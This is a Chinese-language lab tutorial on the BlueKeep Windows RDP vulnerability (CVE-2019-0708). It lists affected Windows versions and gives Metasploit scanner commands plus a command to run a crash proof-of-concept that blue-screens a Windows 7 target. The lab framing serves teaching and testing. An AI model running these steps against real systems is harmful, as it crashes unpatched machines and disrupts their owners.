windows RDP远程代码执行漏洞 实验
实验目的
通过windows远程桌面服务的远程代码执行漏洞,从而使被攻击系统蓝屏。该漏洞影响了某些旧版本的Windows系统
实验原理
此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。
实验环境
1.操作系统
操作机1:windows7
操作机2:kali2018
用户:root
密码:123456
目标机:windows7
2.影响范围
Windows 7
Windows server 2008 R2
Windows server 2008
Windows 2003
Windows xp
注:Windows 8和windows10以及之后的版本不受此漏洞影响
实验步骤
步骤1:部署漏洞环境
1.1.目标机开启3389端口(即远程桌面连接服务)并关闭防火墙。
图1
1.2 pip install impacket 安装impacket模块
图6
1.4.切换到操作机2,升级msf版本,考虑到网络问题这里已经更新为最新版的(不升级msf,使用msf v4版本加载第三方脚本,会报错,可能只因为cve-2019-0708的脚本只兼容最新的msf版本(msf v5))
apt-get update
apt-get install metasploit-framework
图7
1.5.搜索cve-2019-0708脚本,使用脚本,设置参数,并开始攻击。
search 0708
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set rhosts 目标机ip
run
图8
步骤2:创建并执行poc
2.1.操作机1中找到poc,cmd命令行中进入相应目录,输入命令,运行poc
python carshpoc.py 目标机ip 32
图9
2.2.当运行poc后立即切换到目标机查看,发现为蓝屏状态
图10